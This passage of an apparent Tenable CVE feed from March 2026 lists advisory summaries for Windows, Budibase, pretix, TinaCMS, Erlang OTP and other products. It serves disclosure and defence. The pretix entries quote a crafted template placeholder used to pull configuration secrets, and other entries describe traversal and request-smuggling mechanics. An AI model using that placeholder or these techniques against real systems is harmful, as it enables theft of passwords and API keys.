      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25180">https://www.tenable.com/cve/CVE-2026-25180</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25179]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25179</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25179</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:33 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper validation of specified type of input in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25179">https://www.tenable.com/cve/CVE-2026-25179</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25178]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25178</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25178</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:33 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25178">https://www.tenable.com/cve/CVE-2026-25178</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25177]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25177</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25177</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:33 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper restriction of names for files and other resources in Active Directory Domain Services allows an authorized attacker to elevate privileges over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25177">https://www.tenable.com/cve/CVE-2026-25177</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25176]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25176</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25176</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:32 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper access control in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25176">https://www.tenable.com/cve/CVE-2026-25176</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25175]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25175</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25175</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:32 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25175">https://www.tenable.com/cve/CVE-2026-25175</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25174]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25174</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25174</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:32 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out-of-bounds read in Windows Extensible File Allocation allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25174">https://www.tenable.com/cve/CVE-2026-25174</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25173]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25173</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25173</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:31 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Integer overflow or wraparound in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25173">https://www.tenable.com/cve/CVE-2026-25173</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25172]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25172</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25172</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:31 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Integer overflow or wraparound in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to execute code over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25172">https://www.tenable.com/cve/CVE-2026-25172</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25171]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25171</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25171</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:31 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25171">https://www.tenable.com/cve/CVE-2026-25171</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25170]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25170</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25170</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:31 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25170">https://www.tenable.com/cve/CVE-2026-25170</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25169]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25169</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25169</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:30 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Divide by zero in Microsoft Graphics Component allows an unauthorized attacker to deny service locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25169">https://www.tenable.com/cve/CVE-2026-25169</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25168]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25168</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25168</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:30 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Null pointer dereference in Microsoft Graphics Component allows an unauthorized attacker to deny service locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25168">https://www.tenable.com/cve/CVE-2026-25168</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25167]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25167</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25167</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:30 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Microsoft Brokering File System allows an unauthorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25167">https://www.tenable.com/cve/CVE-2026-25167</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25166]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25166</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25166</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:29 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Deserialization of untrusted data in Windows System Image Manager allows an authorized attacker to execute code locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25166">https://www.tenable.com/cve/CVE-2026-25166</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25165]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25165</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25165</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:29 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Null pointer dereference in Windows Performance Counters allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25165">https://www.tenable.com/cve/CVE-2026-25165</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25076]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25076</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25076</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:18 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Anchore Enterprise versions before 5.25.1 contain an SQL injection vulnerability in the GraphQL Reports API. An authenticated attacker that is able to access the GraphQL API could execute arbitrary SQL instructions resulting in modifications to the data contained in the Anchore Enterprise database.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25076">https://www.tenable.com/cve/CVE-2026-25076</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25048]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25048</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25048</guid>
            <pubDate>Thu, 05 Mar 2026 16:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>xgrammar is an open-source library for efficient, flexible, and portable structured generation. Prior to version 0.1.32, the multi-level nested syntax caused a segmentation fault (core dumped). This issue has been patched in version 0.1.32.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25048">https://www.tenable.com/cve/CVE-2026-25048</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25045]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25045</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25045</guid>
            <pubDate>Mon, 09 Mar 2026 21:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Budibase is a low code platform for creating internal tools, workflows, and admin panels. This issue is a combination of Vertical Privilege Escalation and IDOR (Insecure Direct Object Reference) due to missing server-side RBAC checks in the /api/global/users endpoints. A Creator-level user, who should have no permissions to manage users or organizational roles, can instead promote an App Viewer to Tenant Admin, demote a Tenant Admin to App Viewer, or modify the Owner’s account details and all orders (e.g., change name). Because the API accepts these actions without validating the requesting role, a Creator can replay Owner-only requests using their own session tokens. This leads to full tenant compromise.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25045">https://www.tenable.com/cve/CVE-2026-25045</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-25041]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-25041</link>
            <guid>https://www.tenable.com/cve/CVE-2026-25041</guid>
            <pubDate>Mon, 09 Mar 2026 20:16:07 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.23.22 and earlier, the PostgreSQL integration constructs shell commands using user-controlled configuration values (database name, host, password, etc.) without proper sanitization. The password and other connection parameters are directly interpolated into a shell command. This affects packages/server/src/integrations/postgres.ts.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-25041">https://www.tenable.com/cve/CVE-2026-25041</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2451]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2451</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2451</guid>
            <pubDate>Mon, 16 Feb 2026 11:15:56 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained a security-relevant bug: It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for this plugin. Out of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg file.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2451">https://www.tenable.com/cve/CVE-2026-2451</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24297]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24297</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24297</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:27 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Kerberos allows an unauthorized attacker to bypass a security feature over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24297">https://www.tenable.com/cve/CVE-2026-24297</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24296]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24296</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24296</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:26 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24296">https://www.tenable.com/cve/CVE-2026-24296</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24295]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24295</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24295</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:20 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24295">https://www.tenable.com/cve/CVE-2026-24295</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24294]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24294</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24294</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:20 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper authentication in Windows SMB Server allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24294">https://www.tenable.com/cve/CVE-2026-24294</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24293]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24293</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24293</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:20 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Null pointer dereference in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24293">https://www.tenable.com/cve/CVE-2026-24293</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24292]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24292</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24292</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:20 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24292">https://www.tenable.com/cve/CVE-2026-24292</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24291]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24291</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24291</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:19 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Incorrect permission assignment for critical resource in Windows Accessibility Infrastructure (ATBroker.exe) allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24291">https://www.tenable.com/cve/CVE-2026-24291</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24290]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24290</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24290</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:19 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper access control in Windows Projected File System allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24290">https://www.tenable.com/cve/CVE-2026-24290</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24289]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24289</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24289</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:19 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24289">https://www.tenable.com/cve/CVE-2026-24289</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24288]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24288</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24288</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:18 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Heap-based buffer overflow in Windows Mobile Broadband allows an unauthorized attacker to execute code with a physical attack.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24288">https://www.tenable.com/cve/CVE-2026-24288</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24287]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24287</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24287</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:18 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>External control of file name or path in Windows Kernel allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24287">https://www.tenable.com/cve/CVE-2026-24287</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24285]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24285</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24285</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:18 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24285">https://www.tenable.com/cve/CVE-2026-24285</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24283]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24283</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24283</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:18 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Heap-based buffer overflow in Windows File Server allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24283">https://www.tenable.com/cve/CVE-2026-24283</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24282]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24282</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24282</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24282">https://www.tenable.com/cve/CVE-2026-24282</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2415]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2415</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2415</guid>
            <pubDate>Mon, 16 Feb 2026 11:15:56 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained two security-relevant bugs:</p>
      <ul>
        <li>It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for the email subject.</li>
        <li>Placeholders in subjects and plain text bodies of emails were wrongfully evaluated twice. Therefore, if the first evaluation of a placeholder again contains a placeholder, this second placeholder was rendered. This allows the rendering of placeholders controlled by the ticket buyer, and therefore the exploitation of the first issue as a ticket buyer. Luckily, the only buyer-controlled placeholder available in pretix by default (that is not validated in a way that prevents the issue) is {invoice_company}, which is very unusual (but not impossible) to be contained in an email subject template. In addition to broadening the attack surface of the first issue, this could theoretically also leak information about an order to one of the attendees within that order. However, we also consider this scenario very unlikely under typical conditions.</li>
      </ul>
      <p>Out of caution, we recommend that you rotate all passwords and API keys contained in your <a href="https://docs.pretix.eu/self-hosting/config/">pretix.cfg</a> file.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2415">https://www.tenable.com/cve/CVE-2026-2415</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24125]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24125</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24125</guid>
            <pubDate>Thu, 12 Mar 2026 17:16:39 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Tina is a headless content management system. Prior to 2.1.2, TinaCMS allows users to create, update, and delete content documents using relative file paths (relativePath, newRelativePath) via GraphQL mutations. Under certain conditions, these paths are combined with the collection path using path.join() without validating that the resolved path remains within the collection root directory. Because path.join() does not prevent directory traversal, paths containing ../ sequences can escape the intended directory boundary. This vulnerability is fixed in 2.1.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24125">https://www.tenable.com/cve/CVE-2026-24125</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24097]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24097</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24097</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper permission enforcement in Checkmk versions 2.4.0 before 2.4.0p23, 2.3.0 before 2.3.0p43, and 2.2.0 (EOL) allows authenticated users to enumerate existing hosts by observing different HTTP response codes from the agent-receiver/register_existing endpoint, which could lead to information disclosure.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24097">https://www.tenable.com/cve/CVE-2026-24097</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-24018]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-24018</link>
            <guid>https://www.tenable.com/cve/CVE-2026-24018</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:17 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>A UNIX symbolic link (Symlink) following vulnerability in Fortinet FortiClientLinux 7.4.0 through 7.4.4 and FortiClientLinux 7.2.2 through 7.2.12 may allow a local and unprivileged user to escalate their privileges to root.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-24018">https://www.tenable.com/cve/CVE-2026-24018</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23943]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23943</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23943</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:15 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Handling of Highly Compressed Data (Compression Bomb) vulnerability in Erlang OTP ssh (ssh_transport modules) allows Denial of Service via Resource Depletion. The SSH transport layer advertises legacy zlib compression by default and inflates attacker-controlled payloads pre-authentication without any size limit, enabling reliable memory exhaustion DoS. Two compression algorithms are affected:</p>
      <ul>
        <li>zlib: Activates immediately after key exchange, enabling unauthenticated attacks</li>
        <li>zlib@openssh.com: Activates post-authentication, enabling authenticated attacks</li>
      </ul>
      <p>Each SSH packet can decompress ~255 MB from 256 KB of wire data (1029:1 amplification ratio). Multiple packets can rapidly exhaust available memory, causing OOM kills in memory-constrained environments. This vulnerability is associated with program files lib/ssh/src/ssh_transport.erl and program routines ssh_transport:decompress/2, ssh_transport:handle_packet_part/4. This issue affects OTP from OTP 17.0 until OTP 28.4.1, 27.3.4.9 and 26.2.5.18 corresponding to ssh from 3.0.1 until 5.5.1, 5.2.11.6 and 5.1.4.14.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23943">https://www.tenable.com/cve/CVE-2026-23943</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23942]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23942</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23942</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:15 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Erlang OTP (ssh_sftpd module) allows Path Traversal. This vulnerability is associated with program files lib/ssh/src/ssh_sftpd.erl and program routines ssh_sftpd:is_within_root/2. The SFTP server uses string prefix matching via lists:prefix/2 rather than proper path component validation when checking if a path is within the configured root directory. This allows authenticated users to access sibling directories that share a common name prefix with the configured root directory. For example, if root is set to /home/user1, paths like /home/user10 or /home/user1_backup would incorrectly be considered within the root. This issue affects OTP from OTP 17.0 until OTP 28.4.1, OTP 27.3.4.9 and OTP 26.2.5.18, corresponding to ssh from 3.0.1 until 5.5.1, 5.2.11.6 and 5.1.4.14.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23942">https://www.tenable.com/cve/CVE-2026-23942</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23941]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23941</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23941</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in Erlang OTP (inets httpd module) allows HTTP Request Smuggling. This vulnerability is associated with program files lib/inets/src/http_server/httpd_request.erl and program routines httpd_request:parse_headers/7. The server does not reject or normalize duplicate Content-Length headers. The earliest Content-Length in the request is used for body parsing while common reverse proxies (nginx, Apache httpd, Envoy) honor the last Content-Length value. This violates RFC 9112 Section 6.3 and allows front-end/back-end desynchronization, leaving attacker-controlled bytes queued as the start of the next request. This issue affects OTP from OTP 17.0 until OTP 28.4.1, OTP 27.3.4.9 and OTP 26.2.5.18, corresponding to inets from 5.10 until 9.6.1, 9.3.2.3 and 9.1.0.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23941">https://www.tenable.com/cve/CVE-2026-23941</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23940]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23940</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23940</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:14 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Uncontrolled Resource Consumption vulnerability in hexpm hexpm/hexpm allows Excessive Allocation. Publishing an oversized package can cause Hex.pm to run out of memory while extracting the uploaded package tarball. This can terminate the affected application instance and result in a denial of service for package publishing and potentially other package-processing functionality. This issue affects hexpm: before 495f01607d3eae4aed7ad09b2f54f31ec7a7df01; hex.pm: before 2026-03-10.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23940">https://www.tenable.com/cve/CVE-2026-23940</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23907]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23907</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23907</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
